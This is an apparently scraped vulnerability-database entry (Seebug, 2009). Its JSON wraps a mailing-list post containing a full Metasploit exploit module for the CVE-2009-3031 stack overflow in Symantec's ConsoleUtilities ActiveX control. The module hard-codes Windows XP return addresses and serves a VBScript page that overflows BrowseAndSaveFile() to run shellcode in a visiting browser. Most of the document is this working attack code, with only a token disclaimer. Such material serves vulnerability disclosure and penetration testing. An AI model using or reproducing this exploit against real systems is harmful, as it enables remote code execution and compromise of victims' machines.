Symantec ConsoleUtilities ActiveX Control Buffer

2009-11-03T00:00:00

Description

No description provided by source.

{"href": "https://www.seebug.org/vuldb/ssvid-12563", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-11-03T00:00:00", "title": "Symantec ConsoleUtilities ActiveX Control Buffer", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12563", "cvelist": [], "description": "No description provided by source.", "viewCount": 5, "published": "2009-11-03T00:00:00", "sourceData": "\n here is a metasploit exploit module for the Symantec ConsoleUtilities\r\nActiveX Control buffer overflow i published today.\r\n\r\nhttp://sotiriu.de/adv/NSOADV-2009-001.txt\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3031\r\n\r\nSorry, if the code is ugly. It's my first MSF exploit.\r\n\r\nRegards\r\n\r\nlofi\r\n\r\n["symantec_consoleutilities_browseandsavefile.rb" (text/plain)]\r\n\r\n## \r\n# Use it only for education or ethical pentesting! The author accepts no liability for damage caused by \\\r\nthis tool. ##\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack overflow in Symantecs \\\r\n ConsoleUtilities.\r\n By sending an overly long string to the "BrowseAndSaveFile()" \\\r\n method located\r\n in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an \\\r\nattacker may be able to execute arbitrary code.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'Nikolas Sotiriu (lofi)' ],\r\n 'Version' => '1.0',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2009-3031'],\r\n [ 'URL', 'http://sotiriu.de/adv/NSOADV-2009-001.txt' ],\r\n [ 'URL', \\\r\n'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid= \\\r\nsecurity_advisory&year=2009&suid=20091102_00' ], ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => "\\x00",\r\n 'StackAdjustment' => -3500,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n\t\t\t\t\t[ 'Windows XP SP2 Universal',\t { 'Ret' => 0x77d92acc } ], # USER32.dll JMP ESP\r\n\t\t\t\t\t[ 'Windows XP SP2 Pro German', { 'Ret' => 0x77D5AF0A } ], # SHELL32.dll JMP ESP\r\n\t\t\t\t\t[ 'Windows XP SP3 Pro German', { 'Ret' => 0x7E6830D7 } ], # SHELL32.dll JMP ESP\r\n ],\r\n 'DisclosureDate' => 'Nov 02 2009',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def autofilter\r\n false\r\n end\r\n\r\n def check_dependencies\r\n use_zlib\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n # Re-generate the payload\r\n return if ((p = regenerate_payload(cli)) == nil)\r\n\r\n # Randomize variables\r\n vname = rand_text_alpha(rand(20) + 1)\r\n junk = rand_text_alpha(rand(20) + 1)\r\n eip = rand_text_alpha(rand(20) + 1)\r\n morejunk = rand_text_alpha(rand(20) + 1)\r\n sc = rand_text_alpha(rand(20) + 1)\r\n buf = rand_text_alpha(rand(20) + 1)\r\n\r\n\r\n # Set RET and shellcode\r\n ret = Rex::Text.to_unescape([target.ret].pack('V'))\r\n shellcode = Rex::Text.to_unescape(p.encoded)\r\n\r\n # Build the Site\r\n content = %Q|\r\n <html>\r\n <object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' \\\r\nid='#{vname}'></object> <script language='vbscript'>\r\n arg1 = ""\r\n arg3 = ""\r\n arg4 = ""\r\n arg5 = ""\r\n\r\n #{junk}=String(310, "A")\r\n #{eip}=unescape("#{ret}")\r\n #{morejunk}=String(18, unescape("%u0041"))\r\n #{sc}=unescape("#{shellcode}")\r\n\r\n #{buf}=#{junk}+#{eip}+#{morejunk}+#{sc}\r\n #{vname}.BrowseAndSaveFile arg1,#{buf},arg3,arg4,arg5\r\n </script>\r\n </html>\r\n |\r\n\r\n print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n # Transmit the response to the client\r\n send_response_html(cli, content)\r\n\r\n # Handle the payload\r\n handler(cli)\r\n end\r\n\r\nend\r\n_______________________________________________\r\nhttps://mail.metasploit.com/mailman/listinfo/framework\n ", "id": "SSV:12563", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:32:48", "reporter": "Root", "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-3031"]}]}, "exploitation": null, "vulnersScore": 0.9}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645394556, "score": 1659785532, "epss": 1678851499}}